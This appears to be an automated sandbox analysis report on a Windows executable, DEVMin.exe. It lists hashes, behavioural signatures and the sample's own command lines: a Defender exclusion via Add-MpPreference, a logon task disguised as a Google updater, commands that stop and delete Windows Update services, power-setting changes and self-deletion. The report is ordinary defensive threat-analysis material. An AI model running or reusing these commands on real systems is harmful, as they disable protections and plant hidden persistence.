Analysis
-
max time kernel
31s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230621-en -
resource tags
arch:x64, arch:x86, image:win7-20230621-en, locale:en-us, os:windows7-x64, system -
submitted
30-06-2023 12:25
Static task
static1
Behavioral task
behavioral1
Sample
DEVMin.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
DEVMin.exe
Resource
win10v2004-20230621-en
General
-
Target
DEVMin.exe
-
Size
3.6MB
-
MD5
279c66b28f19a510ad6c0f155871fac3
-
SHA1
427bcf049de4b9a848593463e0f36265baa6164c
-
SHA256
ae0b0d973a8b3feff1fb7570e09fadf473b904b8bb53c7eb83da63a53c103164
-
SHA512
f9ae2f0753e689f78ced7d1dbc4273fe17ca1eda2f62ee7a317a4a3614d91fcae62d7aacb8ea1a826f7e0a5a3c5723dc48830483af8e38497bc9593bd2f7f161
-
SSDEEP
98304:JHmeIFVx0/o2Jrd9o2oNiN0KL5Zm2kVehky:DIFVxQJM2eRZfQhky
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
description   ioc                                                                  process
Key deleted   \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters  reg.exe
Key deleted   \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security    reg.exe
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
description             pid    process      target process
PID 1992 created 1304   1992   DEVMin.exe   Explorer.EXE
PID 1992 created 1304   1992   DEVMin.exe   Explorer.EXE
PID 1992 created 1304   1992   DEVMin.exe   Explorer.EXE
PID 1992 created 1304   1992   DEVMin.exe   Explorer.EXE
PID 1992 created 1304   1992   DEVMin.exe   Explorer.EXE
-
Drops file in Drivers directory 1 IoCs
Processes:
description    ioc                                     process
File created   C:\Windows\System32\drivers\etc\hosts   DEVMin.exe
-
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
Processes:
pid    process
1744   cmd.exe
-
Drops file in System32 directory 2 IoCs
Processes:
description                    ioc                                                                                                                            process
File opened for modification   C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk   powershell.exe
File opened for modification   C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk   powershell.exe
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid    process
1440   sc.exe
1500   sc.exe
1540   sc.exe
892    sc.exe
1624   sc.exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
pid    process
1992   DEVMin.exe
1992   DEVMin.exe
2024   powershell.exe
1992   DEVMin.exe
1992   DEVMin.exe
1992   DEVMin.exe
1992   DEVMin.exe
1992   DEVMin.exe
1992   DEVMin.exe
268    powershell.exe
1992   DEVMin.exe
1992   DEVMin.exe
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
description                   pid    process
Token: SeDebugPrivilege       2024   powershell.exe
Token: SeShutdownPrivilege    1224   powercfg.exe
Token: SeShutdownPrivilege    272    powercfg.exe
Token: SeShutdownPrivilege    1324   powercfg.exe
Token: SeDebugPrivilege       268    powershell.exe
Token: SeShutdownPrivilege    1864   powercfg.exe
-
Suspicious use of WriteProcessMemory 48 IoCs
Processes:
description                       pid    process          target process
PID 656 wrote to memory of 1224   656    cmd.exe          powercfg.exe
PID 656 wrote to memory of 1224   656    cmd.exe          powercfg.exe
PID 656 wrote to memory of 1224   656    cmd.exe          powercfg.exe
PID 732 wrote to memory of 1440   732    cmd.exe          sc.exe
PID 732 wrote to memory of 1440   732    cmd.exe          sc.exe
PID 732 wrote to memory of 1440   732    cmd.exe          sc.exe
PID 732 wrote to memory of 1500   732    cmd.exe          sc.exe
PID 732 wrote to memory of 1500   732    cmd.exe          sc.exe
PID 732 wrote to memory of 1500   732    cmd.exe          sc.exe
PID 656 wrote to memory of 272    656    cmd.exe          powercfg.exe
PID 656 wrote to memory of 272    656    cmd.exe          powercfg.exe
PID 656 wrote to memory of 272    656    cmd.exe          powercfg.exe
PID 656 wrote to memory of 1324   656    cmd.exe          powercfg.exe
PID 656 wrote to memory of 1324   656    cmd.exe          powercfg.exe
PID 656 wrote to memory of 1324   656    cmd.exe          powercfg.exe
PID 656 wrote to memory of 1864   656    cmd.exe          powercfg.exe
PID 656 wrote to memory of 1864   656    cmd.exe          powercfg.exe
PID 656 wrote to memory of 1864   656    cmd.exe          powercfg.exe
PID 732 wrote to memory of 1540   732    cmd.exe          sc.exe
PID 732 wrote to memory of 1540   732    cmd.exe          sc.exe
PID 732 wrote to memory of 1540   732    cmd.exe          sc.exe
PID 732 wrote to memory of 1624   732    cmd.exe          sc.exe
PID 732 wrote to memory of 1624   732    cmd.exe          sc.exe
PID 732 wrote to memory of 1624   732    cmd.exe          sc.exe
PID 732 wrote to memory of 892    732    cmd.exe          sc.exe
PID 732 wrote to memory of 892    732    cmd.exe          sc.exe
PID 732 wrote to memory of 892    732    cmd.exe          sc.exe
PID 732 wrote to memory of 1488   732    cmd.exe          reg.exe
PID 732 wrote to memory of 1488   732    cmd.exe          reg.exe
PID 732 wrote to memory of 1488   732    cmd.exe          reg.exe
PID 732 wrote to memory of 612    732    cmd.exe          reg.exe
PID 732 wrote to memory of 612    732    cmd.exe          reg.exe
PID 732 wrote to memory of 612    732    cmd.exe          reg.exe
PID 732 wrote to memory of 1120   732    cmd.exe          reg.exe
PID 732 wrote to memory of 1120   732    cmd.exe          reg.exe
PID 732 wrote to memory of 1120   732    cmd.exe          reg.exe
PID 732 wrote to memory of 1400   732    cmd.exe          reg.exe
PID 732 wrote to memory of 1400   732    cmd.exe          reg.exe
PID 732 wrote to memory of 1400   732    cmd.exe          reg.exe
PID 732 wrote to memory of 1048   732    cmd.exe          reg.exe
PID 732 wrote to memory of 1048   732    cmd.exe          reg.exe
PID 732 wrote to memory of 1048   732    cmd.exe          reg.exe
PID 268 wrote to memory of 1620   268    powershell.exe   schtasks.exe
PID 268 wrote to memory of 1620   268    powershell.exe   schtasks.exe
PID 268 wrote to memory of 1620   268    powershell.exe   schtasks.exe
PID 1744 wrote to memory of 764   1744   cmd.exe          choice.exe
PID 1744 wrote to memory of 764   1744   cmd.exe          choice.exe
PID 1744 wrote to memory of 764   1744   cmd.exe          choice.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXE  [level 1]
  cmdline: C:\Windows\Explorer.EXE
-
C:\Users\Admin\AppData\Local\Temp\DEVMin.exe  [level 2]
  cmdline: "C:\Users\Admin\AppData\Local\Temp\DEVMin.exe"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [level 2]
  cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [level 2]
  cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#owhqpc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\Google\Chrome\updater.exe' }
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe  [level 3]
  cmdline: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\Google\Chrome\updater.exe'
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe  [level 2]
  cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exe  [level 3]
  cmdline: powercfg /x -hibernate-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exe  [level 3]
  cmdline: powercfg /x -hibernate-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exe  [level 3]
  cmdline: powercfg /x -standby-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exe  [level 3]
  cmdline: powercfg /x -standby-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe  [level 2]
  cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exe  [level 3]
  cmdline: sc stop UsoSvc
- Launches sc.exe
-
C:\Windows\System32\sc.exe  [level 3]
  cmdline: sc stop WaaSMedicSvc
- Launches sc.exe
-
C:\Windows\System32\sc.exe  [level 3]
  cmdline: sc stop wuauserv
- Launches sc.exe
-
C:\Windows\System32\sc.exe  [level 3]
  cmdline: sc stop dosvc
- Launches sc.exe
-
C:\Windows\System32\sc.exe  [level 3]
  cmdline: sc stop bits
- Launches sc.exe
-
C:\Windows\System32\reg.exe  [level 3]
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
-
C:\Windows\System32\reg.exe  [level 3]
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
-
C:\Windows\System32\reg.exe  [level 3]
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
- Modifies security service
-
C:\Windows\System32\reg.exe  [level 3]
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
-
C:\Windows\System32\reg.exe  [level 3]
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
-
C:\Windows\System32\cmd.exe  [level 2]
  cmdline: C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\DEVMin.exe"
- Deletes itself
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\choice.exe  [level 3]
  cmdline: choice /C Y /N /D Y /T 3
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36K3VUO6VH7E1ET55NXF.temp
Filesize 7KB
MD5 22d22870a64e87573a1b2e314e2e73b8
SHA1 67ab118a231f9c0fb13eaf56d226cb76f38c34c8
SHA256 b6e360925220e35dee78de967b7458d5527bdce875230e89d0a8addf438937ff
SHA512 690cadc2bbe6337ce9801d1fa4df2bf710fb4a2f5d097470b50d3799ca21a3fb031ab5887984886a8d3c9df45dd88e72ad5c4a7d755cd8c49b8b7897a49db4ea
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize 7KB
MD5 22d22870a64e87573a1b2e314e2e73b8
SHA1 67ab118a231f9c0fb13eaf56d226cb76f38c34c8
SHA256 b6e360925220e35dee78de967b7458d5527bdce875230e89d0a8addf438937ff
SHA512 690cadc2bbe6337ce9801d1fa4df2bf710fb4a2f5d097470b50d3799ca21a3fb031ab5887984886a8d3c9df45dd88e72ad5c4a7d755cd8c49b8b7897a49db4ea
-
memory/268-71-0x0000000002660000-0x00000000026E0000-memory.dmp   Filesize 512KB
-
memory/268-68-0x000000001B100000-0x000000001B3E2000-memory.dmp   Filesize 2.9MB
-
memory/268-69-0x0000000002250000-0x0000000002258000-memory.dmp   Filesize 32KB
-
memory/268-72-0x0000000002660000-0x00000000026E0000-memory.dmp   Filesize 512KB
-
memory/268-70-0x0000000002660000-0x00000000026E0000-memory.dmp   Filesize 512KB
-
memory/268-73-0x0000000002660000-0x00000000026E0000-memory.dmp   Filesize 512KB
-
memory/1992-75-0x000000013F220000-0x000000013F5BA000-memory.dmp   Filesize 3.6MB
-
memory/2024-61-0x00000000024EB000-0x0000000002522000-memory.dmp   Filesize 220KB
-
memory/2024-60-0x00000000024E4000-0x00000000024E7000-memory.dmp   Filesize 12KB
-
memory/2024-59-0x00000000022D0000-0x00000000022D8000-memory.dmp   Filesize 32KB
-
memory/2024-58-0x000000001B190000-0x000000001B472000-memory.dmp   Filesize 2.9MB